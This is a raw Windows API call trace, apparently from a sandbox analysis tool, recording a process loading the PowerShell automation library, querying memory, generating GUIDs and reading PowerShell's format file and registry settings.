	[0759.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.668] VirtualQuery (in: lpAddress=0xcb220, lpBuffer=0xcc0e0, dwLength=0x30 | out: lpBuffer=0xcc0e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0759.669] VirtualQuery (in: lpAddress=0xcb2b0, lpBuffer=0xcc170, dwLength=0x30 | out: lpBuffer=0xcc170*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0759.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.671] VirtualQuery (in: lpAddress=0xcba30, lpBuffer=0xcc8f0, dwLength=0x30 | out: lpBuffer=0xcc8f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0759.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.672] VirtualQuery (in: lpAddress=0xcba30, lpBuffer=0xcc8f0, dwLength=0x30 | out: lpBuffer=0xcc8f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0759.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.676] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x423be1c8, Data2=0xc18e, Data3=0x4eb7, Data4=([0]=0xaf, [1]=0x1, [2]=0xd8, [3]=0xf4, [4]=0x2, [5]=0x8a, [6]=0x83, [7]=0x5d))) returned 0x0
	[0760.928] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x657270f5, Data2=0x28c7, Data3=0x4142, Data4=([0]=0x80, [1]=0x39, [2]=0x56, [3]=0x35, [4]=0xd0, [5]=0xf1, [6]=0x6f, [7]=0x9d))) returned 0x0
	[0760.928] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x681adece, Data2=0x6e2b, Data3=0x4ee6, Data4=([0]=0xa8, [1]=0xd1, [2]=0xe7, [3]=0xd7, [4]=0x46, [5]=0xf, [6]=0x4b, [7]=0x27))) returned 0x0
	[0760.930] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x1551c996, Data2=0x5f8b, Data3=0x4254, Data4=([0]=0xa6, [1]=0x42, [2]=0xed, [3]=0x44, [4]=0x16, [5]=0xa6, [6]=0x5, [7]=0xb2))) returned 0x0
	[0760.931] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xa2db69bf, Data2=0xd6f3, Data3=0x49c1, Data4=([0]=0xa0, [1]=0x5f, [2]=0xfd, [3]=0xae, [4]=0x76, [5]=0xf9, [6]=0x98, [7]=0x6d))) returned 0x0
	[0760.931] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x2cc43c4, Data2=0x9175, Data3=0x4776, Data4=([0]=0xa1, [1]=0xd5, [2]=0xe8, [3]=0x98, [4]=0xd1, [5]=0x8, [6]=0x72, [7]=0xd8))) returned 0x0
	[0760.932] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xa71328ae, Data2=0x51a, Data3=0x433e, Data4=([0]=0x95, [1]=0x61, [2]=0x6b, [3]=0x2a, [4]=0x37, [5]=0xa7, [6]=0xf0, [7]=0x3b))) returned 0x0
	[0760.932] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xa3f18f2c, Data2=0xd181, Data3=0x4255, Data4=([0]=0xad, [1]=0x47, [2]=0xf8, [3]=0x1f, [4]=0xa6, [5]=0xf1, [6]=0xb9, [7]=0x40))) returned 0x0
	[0760.932] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xc390c58a, Data2=0x349, Data3=0x4a78, Data4=([0]=0xa0, [1]=0xc1, [2]=0xd5, [3]=0xa5, [4]=0xa2, [5]=0x28, [6]=0x43, [7]=0x43))) returned 0x0
	[0760.932] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x6c6db0f8, Data2=0x7f1d, Data3=0x4a98, Data4=([0]=0x95, [1]=0x88, [2]=0x38, [3]=0x47, [4]=0x64, [5]=0xd7, [6]=0xfd, [7]=0x45))) returned 0x0
	[0760.932] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xfed19dfc, Data2=0x26fa, Data3=0x47a1, Data4=([0]=0xa7, [1]=0xa6, [2]=0x39, [3]=0x45, [4]=0x2d, [5]=0x84, [6]=0x7, [7]=0xa6))) returned 0x0
	[0760.932] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x86831342, Data2=0x3580, Data3=0x44b1, Data4=([0]=0xaf, [1]=0xa0, [2]=0xa1, [3]=0xf0, [4]=0x4f, [5]=0xb3, [6]=0x18, [7]=0x8b))) returned 0x0
	[0760.934] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xfaae649d, Data2=0x2451, Data3=0x4e4a, Data4=([0]=0x81, [1]=0x18, [2]=0xf8, [3]=0x6d, [4]=0xf3, [5]=0xac, [6]=0xe7, [7]=0xbf))) returned 0x0
	[0761.029] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xec9d5802, Data2=0xfc10, Data3=0x43e5, Data4=([0]=0xaf, [1]=0xae, [2]=0x4e, [3]=0x8, [4]=0x73, [5]=0xe4, [6]=0x98, [7]=0xa8))) returned 0x0
	[0761.030] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xe1a15554, Data2=0xaf26, Data3=0x46c0, Data4=([0]=0x87, [1]=0xe1, [2]=0x72, [3]=0x17, [4]=0x79, [5]=0x47, [6]=0x33, [7]=0xf9))) returned 0x0
	[0761.030] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xedac066a, Data2=0xb574, Data3=0x4b72, Data4=([0]=0xb0, [1]=0x62, [2]=0x26, [3]=0x71, [4]=0xc4, [5]=0xb0, [6]=0xff, [7]=0x6a))) returned 0x0
	[0761.030] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x21983b3b, Data2=0x300d, Data3=0x47d9, Data4=([0]=0x94, [1]=0x8, [2]=0x7a, [3]=0x4b, [4]=0x47, [5]=0x1d, [6]=0x23, [7]=0xac))) returned 0x0
	[0761.031] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xd7794713, Data2=0x56d5, Data3=0x41b3, Data4=([0]=0x96, [1]=0x5e, [2]=0xf7, [3]=0x91, [4]=0x43, [5]=0x7, [6]=0x95, [7]=0x64))) returned 0x0
	[0761.031] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xba85178c, Data2=0x1e22, Data3=0x4612, Data4=([0]=0x8a, [1]=0x7e, [2]=0xde, [3]=0xed, [4]=0x1f, [5]=0x75, [6]=0x4f, [7]=0xf4))) returned 0x0
	[0761.031] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x50e9c9d9, Data2=0x202, Data3=0x4c4a, Data4=([0]=0x8a, [1]=0x7d, [2]=0xc5, [3]=0x41, [4]=0x8c, [5]=0x84, [6]=0xbf, [7]=0xcc))) returned 0x0
	[0761.031] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xacfbe9ad, Data2=0x4aab, Data3=0x4e11, Data4=([0]=0xb4, [1]=0x93, [2]=0xc8, [3]=0x28, [4]=0x7e, [5]=0x1, [6]=0xbe, [7]=0x9b))) returned 0x0
	[0761.031] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x4a1e91e3, Data2=0x88c0, Data3=0x4b47, Data4=([0]=0x83, [1]=0x28, [2]=0xcc, [3]=0x2e, [4]=0xa3, [5]=0xe2, [6]=0xdf, [7]=0x5a))) returned 0x0
	[0761.033] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0761.033] GetFileType (hFile=0x318) returned 0x1
	[0761.033] SetErrorMode (uMode=0x1) returned 0x1
	[0761.033] GetFileType (hFile=0x318) returned 0x1
	[0761.033] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.033] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.034] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.034] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.034] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.034] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.034] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.035] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.035] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.036] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.036] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.036] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.036] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.037] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.037] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.037] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.037] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.038] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.038] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.039] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.039] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0761.039] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0xe67, lpOverlapped=0x0) returned 1
	[0761.040] ReadFile (in: hFile=0x318, lpBuffer=0x2f9de3f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9de3f*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0761.040] ReadFile (in: hFile=0x318, lpBuffer=0x2f9e870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f9e870*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0761.040] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x318) returned 0x0
	[0761.040] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf6c, lpData=0x0, lpcbData=0xccf68*=0x0 | out: lpType=0xccf6c*=0x1, lpData=0x0, lpcbData=0xccf68*=0x56) returned 0x0
	[0761.040] CoTaskMemAlloc (cb=0x5a) returned 0x1b805760
	[0761.040] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf3c, lpData=0x1b805760, lpcbData=0xccf38*=0x56 | out: lpType=0xccf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf38*=0x56) returned 0x0
	[0761.040] CoTaskMemFree (pv=0x1b805760) 
	[0761.041] RegCloseKey (hKey=0x318) returned 0x0
	[0761.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0761.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0761.042] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xc4acf891, Data2=0x7193, Data3=0x4c90, Data4=([0]=0xb0, [1]=0x3f, [2]=0x5e, [3]=0x46, [4]=0x81, [5]=0x2f, [6]=0x99, [7]=0xde))) returned 0x0
	[0761.043] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xecf4224a, Data2=0xbedc, Data3=0x47f4, Data4=([0]=0x9e, [1]=0x41, [2]=0x38, [3]=0xaa, [4]=0x98, [5]=0xa9, [6]=0xdb, [7]=0x49))) returned 0x0
	[0761.043] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x13d61bbf, Data2=0x9eba, Data3=0x456c, Data4=([0]=0x90, [1]=0xf5, [2]=0x1e, [3]=0x40, [4]=0xa8, [5]=0x40, [6]=0xd8, [7]=0x8a))) returned 0x0
	[0761.043] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x5afa7d69, Data2=0x5348, Data3=0x4930, Data4=([0]=0xa5, [1]=0x19, [2]=0x43, [3]=0x1e, [4]=0xb6, [5]=0x1e, [6]=0x57, [7]=0xda))) returned 0x0
	[0761.043] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x195bc77a, Data2=0xb240, Data3=0x4777, Data4=([0]=0x8a, [1]=0xe3, [2]=0xb3, [3]=0x1c, [4]=0xb1, [5]=0x9f, [6]=0x4e, [7]=0xea))) returned 0x0
	[0761.043] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x7b26f33a, Data2=0xb8c3, Data3=0x4a8a, Data4=([0]=0xaa, [1]=0x2d, [2]=0x64, [3]=0x2b, [4]=0x61, [5]=0x45, [6]=0x50, [7]=0x76))) returned 0x0
	[0761.043] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x326ee656, Data2=0x95f2, Data3=0x4a66, Data4=([0]=0x8c, [1]=0xe2, [2]=0x7e, [3]=0x69, [4]=0xe7, [5]=0x2f, [6]=0x57, [7]=0x6b))) returned 0x0
	[0761.043] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xb9d916ee, Data2=0x4609, Data3=0x4682, Data4=([0]=0x93, [1]=0xcf, [2]=0xd1, [3]=0x35, [4]=0xf, [5]=0xe6, [6]=0x67, [7]=0xeb))) returned 0x0
	[0761.044] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xdb94dce8, Data2=0xab3a, Data3=0x4264, Data4=([0]=0xad, [1]=0x40, [2]=0xab, [3]=0x2e, [4]=0xe, [5]=0x28, [6]=0xd6, [7]=0x2))) returned 0x0
	[0761.044] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xc6b06df7, Data2=0xdc7b, Data3=0x4864, Data4=([0]=0x97, [1]=0x24, [2]=0x3d, [3]=0x4d, [4]=0xe9, [5]=0x7d, [6]=0xd8, [7]=0x93))) returned 0x0
	[0761.044] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xcacb8582, Data2=0x3e58, Data3=0x4a43, Data4=([0]=0x8e, [1]=0x65, [2]=0x2d, [3]=0xd1, [4]=0x37, [5]=0x1, [6]=0x44, [7]=0x51))) returned 0x0
	[0761.044] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x9ac120fc, Data2=0xbcdb, Data3=0x4de6, Data4=([0]=0x94, [1]=0xfe, [2]=0xf0, [3]=0x23, [4]=0x58, [5]=0x31, [6]=0x46, [7]=0x33))) returned 0x0
	[0761.044] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x34555803, Data2=0xafaa, Data3=0x42b9, Data4=([0]=0xa4, [1]=0x6a, [2]=0x3, [3]=0x40, [4]=0x47, [5]=0x7e, [6]=0xac, [7]=0xd1))) returned 0x0
	[0761.044] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xc13ee78f, Data2=0x2200, Data3=0x4504, Data4=([0]=0x98, [1]=0xec, [2]=0x31, [3]=0x63, [4]=0x65, [5]=0x0, [6]=0x5b, [7]=0x28))) returned 0x0
	[0761.044] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xf9210ffb, Data2=0x9ad5, Data3=0x4509, Data4=([0]=0xad, [1]=0xb3, [2]=0xc8, [3]=0x12, [4]=0x39, [5]=0xc, [6]=0x4d, [7]=0x60))) returned 0x0
	[0761.044] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x600f9e8e, Data2=0xc0b, Data3=0x4758, Data4=([0]=0x86, [1]=0x36, [2]=0x82, [3]=0x28, [4]=0xcb, [5]=0x8b, [6]=0x9d, [7]=0x6d))) returned 0x0
	[0761.044] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xfdb75e7d, Data2=0x5b1d, Data3=0x4776, Data4=([0]=0xb7, [1]=0xd6, [2]=0xe6, [3]=0xb3, [4]=0x4f, [5]=0x45, [6]=0x4f, [7]=0xf2))) returned 0x0
